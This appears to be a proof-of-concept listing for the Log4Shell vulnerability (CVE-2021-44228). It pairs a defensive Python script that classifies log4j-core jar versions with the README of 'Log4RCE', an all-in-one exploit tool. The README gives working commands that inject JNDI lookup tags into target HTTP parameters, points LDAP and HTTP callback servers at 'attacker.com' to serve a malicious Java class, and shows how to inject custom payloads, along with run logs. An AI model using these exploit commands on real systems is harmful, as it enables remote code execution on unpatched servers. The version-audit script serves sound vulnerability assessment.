CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Associated Vulnerability
Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
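
The version ranges in the description above, written as a check that can be run over a jar inventory. This is an added example, not part of the PoC repository: the function names, status labels and sample paths are constructed here, and it assumes that later patch releases on the 2.3.x and 2.12.x branches keep the removal.

```python
import re

_STAGE = {"alpha": 0, "beta": 1, "rc": 2, None: 3}  # pre-releases sort before final
_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$", re.I)
_JAR = re.compile(r"(?:^|[\\/])log4j-core-(.+)\.jar$")  # only log4j-core is in scope
# Assumption: later patch releases on the backport branches keep the removal.
_BACKPORT_FLOOR = {(2, 3): 1, (2, 12): 2}  # 2.3.1 and 2.12.2 / 2.12.3
SAMPLE_PATHS = [  # constructed inventory, not taken from the page
    "app/lib/log4j-core-2.14.1.jar", "app/lib/log4j-api-2.14.1.jar",
    "svc/lib/log4j-core-2.12.3.jar", "old/log4j-core-2.0-beta8.jar"]

def parse_version(text):
    """Return a sortable (major, minor, patch, stage, stage_no) tuple."""
    m = _VERSION.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    major, minor, patch, stage, num = m.groups()
    rank = _STAGE[stage.lower() if stage else None]
    return (int(major), int(minor), int(patch or 0), rank, int(num or 0))

def classify(text):
    """Map a log4j-core version to its status per the CVE description."""
    v = parse_version(text)
    if v[0] != 2:
        return "out-of-scope"  # the description covers Log4j2 only
    if v < parse_version("2.0-beta9"):
        return "not-affected"  # predates the affected range
    floor = _BACKPORT_FLOOR.get(v[:2])
    backport = v[3] == _STAGE[None] and floor is not None and v[2] >= floor
    if backport or v >= parse_version("2.16.0"):
        return "lookup-removed"
    if v == parse_version("2.15.0"):
        return "affected-disabled-by-default"
    return "affected"  # e.g. 2.16.0-rc1 lands here too (conservative)

def audit(paths):
    """Classify every log4j-core jar found in an iterable of file paths."""
    report = {}
    for path in paths:
        m = _JAR.search(path)
        if not m:
            continue  # other artifacts (log4j-api etc.) are skipped
        try:
            report[path] = classify(m.group(1))
        except ValueError:
            report[path] = "unknown-version"
    return report

if __name__ == "__main__":
    for path, status in audit(SAMPLE_PATHS).items():
        print(f"{status:30} {path}")
```
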
Description
An All-In-One Pure Python PoC for CVE-2021-44228
Readme
# Python Log4RCE

An all-in-one pure Python3 PoC for [CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228).

## Sample

```bash
python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"
```

```
INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!
```

## Usage

This is a CLI tool. All options can be found in the help menu:

```bash
python3 log4rce.py --help
```

The list is extensive, so the following sections summarize the functionality.

### Attack Modes

The tool allows you to use a few attack modes. These attacks are extensions of the `Log4RCE` class.

#### HTTP

You can perform an automated HTTP request attack on a target URL.

You can perform a GET request as follows:

```bash
python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"
```

You can perform a POST request as follows:

```bash
python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"
```

Both requests inject the JNDI tag in place of `###`.

#### Manual

If you cannot use any of the previous modes, use this mode to dump the JNDI tag:

```bash
python3 log4rce.py manual
```

### Network Settings

The tool allows extensive customization of most network configuration. All the internal servers can be modified to point to different locations according to the remote settings.

#### HTTP Server

You can configure the HTTP server using the following parameters:

```bash
python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"
```

```
http_port: The local port to run the server on.
http_rport: The port that a remote machine accesses.
http_host: The host name/IP a remote machine accesses. 
```

#### LDAP Server

You can configure the LDAP server using the following parameters:

```bash
python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"
```

```
ldap_port: The local port to run the server on.
ldap_rport: The port that a remote machine accesses.
ldap_host: The host name/IP a remote machine accesses. 
```

### Customization

The tool can handle some customization. The following lists some functionality you may be interested in.

#### Injecting Payload

You can inject a payload into the Java class using:

```bash
python3 log4rce.py --payload "PAYLOAD"
```

The payload will be injected into `"###"` strings.

#### Custom Java Payload

You can build your own Java class using the following:

```bash
javac -source 1.7 -target 1.7 /path/to/Exploit.java
```

The resulting `.class` can be run using:

```bash
python3 log4rce.py --java_class "/path/to/Exploit.class" ...
```

Note: You can add a string `"###"` to allow payload injection.
File Snapshot

```
[4.0K] /data/pocs/54df8018fe97230bed42fa7066c778d8b1512620
├── [4.0K] java
│   ├── [ 139] Exploit.java
│   └── [ 173] LinuxExploit.java
├── [1.0K] LICENSE
├── [ 14K] log4rce.py
└── [3.0K] README.md

1 directory, 5 files
```